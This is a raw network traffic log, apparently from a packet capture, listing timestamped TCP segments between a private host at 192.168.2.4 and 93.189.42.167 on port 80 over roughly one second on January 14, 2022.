Jan 14, 2022 00:15:50.905596972 CET	49871	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:50.937753916 CET	49872	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:50.957190990 CET	80	49871	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:50.989574909 CET	80	49872	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:50.991348028 CET	49872	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:50.991506100 CET	49872	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:50.991627932 CET	49872	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:51.043874025 CET	80	49872	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.084978104 CET	80	49872	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.085066080 CET	49872	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:51.103286982 CET	49872	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:51.147500992 CET	49873	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:51.156567097 CET	80	49872	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.198715925 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.198838949 CET	49873	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:51.198934078 CET	49873	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:51.258764029 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.258789062 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.258805037 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.258821011 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.258837938 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.258852005 CET	49873	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:51.258853912 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.258893013 CET	49873	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:51.258913994 CET	49873	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:51.259190083 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.259206057 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.259223938 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.259253025 CET	49873	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:51.259736061 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.262454987 CET	49873	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:51.309349060 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.309398890 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.309442997 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.309479952 CET	49873	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:51.309499979 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.309540987 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.309555054 CET	49873	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:51.309580088 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.309618950 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.309643984 CET	49873	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:51.309660912 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.309701920 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.309739113 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.309756041 CET	49873	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:51.309781075 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.309788942 CET	49873	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:51.309820890 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.309889078 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.309926987 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.309937000 CET	49873	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:51.309968948 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.309986115 CET	49873	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:51.310009956 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.310185909 CET	49873	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:51.312875032 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.312920094 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.312957048 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.312997103 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.313014984 CET	49873	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:51.313045025 CET	49873	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:51.360727072 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.360752106 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.360770941 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.360790014 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.360806942 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.360826015 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.360843897 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.360860109 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.360873938 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.360872984 CET	49873	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:51.360891104 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.360897064 CET	49873	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:51.360908985 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.360925913 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.360934019 CET	49873	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:51.360943079 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.360960007 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.360964060 CET	49873	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:51.360974073 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.360991001 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.361017942 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.361021996 CET	49873	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:51.361037016 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.361048937 CET	49873	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:51.361053944 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.361072063 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.361078978 CET	49873	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:51.361088991 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.361107111 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.361110926 CET	49873	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:51.361124992 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.361141920 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.361156940 CET	49873	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:51.361159086 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.361176014 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.361181021 CET	49873	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:51.361193895 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.361212969 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.361221075 CET	49873	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:51.361231089 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.361248016 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.361248016 CET	49873	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:51.361263990 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.361278057 CET	49873	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:51.361282110 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.361326933 CET	49873	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:51.364737034 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.364762068 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.364773989 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.364785910 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.364798069 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.364814043 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.364833117 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.364845037 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.364860058 CET	49873	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:51.364886045 CET	49873	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:51.412014008 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.412040949 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.412075043 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.412091017 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.412106991 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.412122011 CET	49873	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:51.412125111 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.412151098 CET	49873	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:51.412154913 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.412180901 CET	49873	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:51.412183046 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.412199020 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.412228107 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.412251949 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.412254095 CET	49873	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:51.412277937 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.412277937 CET	49873	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:51.412293911 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.412309885 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.412319899 CET	49873	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:51.412328005 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.412343979 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.412360907 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.412368059 CET	49873	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:51.412379026 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.412395954 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.412405968 CET	49873	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:51.412412882 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.412426949 CET	49873	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:51.412430048 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.412446976 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.412465096 CET	49873	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:51.412477016 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.412493944 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.412501097 CET	49873	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:51.412525892 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.412554979 CET	49873	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:51.412568092 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.412597895 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.412615061 CET	49873	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:51.412616014 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.412633896 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.412651062 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.412662029 CET	49873	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:51.412676096 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.412693024 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.412700891 CET	49873	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:51.412710905 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.412728071 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.412739992 CET	49873	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:51.412744999 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.412763119 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.412766933 CET	49873	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:51.412781000 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.412798882 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.412808895 CET	49873	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:51.412817955 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.412833929 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.412852049 CET	49873	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:51.412883043 CET	49873	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:51.416371107 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.416397095 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.416414976 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.416439056 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.416448116 CET	49873	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:51.416450024 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.416464090 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.416481018 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.416491032 CET	49873	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:51.416543961 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.416549921 CET	49873	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:51.416665077 CET	49873	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:51.463583946 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.463625908 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.463653088 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.463685036 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.463691950 CET	49873	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:51.463709116 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.463732004 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.463743925 CET	49873	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:51.463761091 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.463790894 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.463799000 CET	49873	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:51.463845015 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.463850975 CET	49873	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:51.463912964 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.463947058 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.463963032 CET	49873	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:51.464000940 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.464056969 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.464081049 CET	49873	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:51.464085102 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.464121103 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.464138985 CET	49873	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:51.464178085 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.464209080 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.464229107 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.464262962 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.464283943 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.464309931 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.464330912 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.464366913 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.464380980 CET	49873	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:51.464390039 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.464418888 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.464452028 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.464452982 CET	49873	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:51.464473009 CET	49873	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:51.464481115 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.464493036 CET	49873	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:51.464508057 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.464535952 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.464555979 CET	49873	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:51.464565992 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.464593887 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.464620113 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.464647055 CET	49873	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:51.464648962 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.464673996 CET	49873	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:51.464674950 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.464704037 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.464730024 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.464757919 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.464757919 CET	49873	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:51.464786053 CET	49873	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:51.464787006 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.464813948 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.464842081 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.464865923 CET	49873	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:51.464893103 CET	49873	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:51.466959000 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.466989040 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.467016935 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.467044115 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.467070103 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.467076063 CET	49873	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:51.467097044 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.467118025 CET	49873	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:51.467125893 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.467144966 CET	49873	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:51.467153072 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.467202902 CET	49873	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:51.515465975 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.515494108 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.515505075 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.515517950 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.515547991 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.515573978 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.515589952 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.515635014 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.515661001 CET	49873	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:51.515676022 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.515688896 CET	49873	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:51.515706062 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.515707970 CET	49873	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:51.515722990 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.515739918 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.515758991 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.515762091 CET	49873	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:51.515775919 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.515789986 CET	49873	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:51.515794039 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.515813112 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.515822887 CET	49873	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:51.515834093 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.515851974 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.515863895 CET	49873	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:51.515868902 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.515885115 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.515902996 CET	49873	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:51.515903950 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.515921116 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.515932083 CET	49873	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:51.515938997 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.515955925 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.515968084 CET	49873	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:51.515980005 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.515996933 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.516009092 CET	49873	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:51.516015053 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.516032934 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.516041994 CET	49873	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:51.516052961 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.516076088 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.516083002 CET	49873	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:51.516103029 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.516113997 CET	49873	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:51.516127110 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.516149998 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.516166925 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.516172886 CET	49873	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:51.516186953 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.516204119 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.516222000 CET	49873	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:51.516227961 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.516246080 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.516252041 CET	49873	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:51.516267061 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.516283989 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.516303062 CET	49873	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:51.516318083 CET	49873	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:51.519352913 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.519396067 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.519434929 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.519459963 CET	49873	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:51.519473076 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.519511938 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.519526958 CET	49873	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:51.519551039 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.519606113 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.519613028 CET	49873	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:51.519627094 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.519679070 CET	49873	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:51.567269087 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.567313910 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.567353964 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.567393064 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.567431927 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.567472935 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.567477942 CET	49873	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:51.567509890 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.567512989 CET	49873	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:51.567519903 CET	49873	80	192.168.2.4	93.189.42.167
